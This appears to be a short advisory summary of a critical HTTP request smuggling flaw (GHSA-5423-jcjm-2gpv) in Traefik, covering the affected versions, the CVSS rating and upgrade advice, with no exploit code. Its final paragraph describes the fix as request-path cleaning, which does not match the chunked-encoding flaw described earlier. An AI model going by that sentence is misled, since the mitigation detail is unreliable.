GHSA-5423-jcjm-2gpv: 
vulnerability analysis and mitigation

The vulnerability (GHSA-5423-jcjm-2gpv) is a critical HTTP Request Smuggling vulnerability affecting Traefik, discovered and disclosed on April 18, 2025. The issue affects Traefik versions prior to v2.11.24, versions v3.3.x before v3.3.6, and versions v3.4.x before v3.4.0-rc2. This vulnerability stems from the net/http package's improper handling of chunked transfer encoding data containing invalid chunk-size lines terminated by a bare LF (GitHub Advisory).

The vulnerability occurs when the net/http package incorrectly accepts data in chunked transfer encoding containing an invalid chunk-size line terminated by a bare LF. When used in conjunction with a server or proxy that incorrectly interprets a bare LF in a chunk extension as part of the extension, this could enable request smuggling attacks. The vulnerability has been assigned a Critical severity rating with a CVSS score of 9.1, with the following vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N (GitHub Advisory).

The vulnerability poses significant security risks with high potential impact on both confidentiality and integrity of affected systems, while not affecting system availability. The critical CVSS score of 9.1 indicates that successful exploitation could lead to unauthorized access and potential data manipulation in affected Traefik installations (GitHub Advisory).

Users are advised to upgrade to the patched versions: Traefik v2.11.24, v3.3.6, or v3.4.0-rc2. These releases include fixes for the HTTP Request Smuggling vulnerability. Since these versions, the incoming request path is cleaned before being used to match router rules and sent to backends, with any /../, /./, or duplicate slash segments being interpreted and collapsed (Traefik Release, Traefik Release, Traefik Release).